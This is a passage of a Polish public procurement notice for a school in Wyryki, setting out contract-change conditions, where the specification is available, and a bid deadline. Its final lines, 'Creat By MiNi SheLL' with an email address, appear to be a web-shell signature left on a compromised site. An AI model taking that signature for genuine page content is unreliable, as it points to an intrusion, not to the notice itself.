<p>Zamawiający przewiduje możliwość istotnych zmian następujących postanowień zawartej umowy, po zaistnieniu określonych warunków:  zmiana terminu wykonania umowy spowodowana przyczynami zewnętrznymi niezależnymi od Zamawiającego lub Wykonawcy, których w chwili zawarcia umowy nie można było przewidzieć (stan wyższej konieczności) skutkującymi niemożliwością terminowej realizacji robót. W przypadku wystąpienia w/w okoliczności termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania przedmiotu umowy w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności,  zmiana terminu wykonania umowy, jeżeli z powodu okoliczności wymienionych w art.67 ust.1 pkt.5 i 6 ustawy, Zamawiający udzielił by Wykonawcy zamówień dodatkowych lub uzupełniających w trybie zamówienia z wolnej ręki.
Zmiany takie wymagają uprzedniej pisemnej zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zswyryki.szkolnastrona.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia  można uzyskać pod adresem: 

Zespół Szkół w Wyrykach; Wyryki 208 , 22-205 Wyryki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2014 godzina 12:00, miejsce: Sekretariat Zespołu Szkół w Wyrykach, Wyryki 208 , 22-205 Wyryki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z Programu Operacyjnego Kapitał Ludzki, finansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com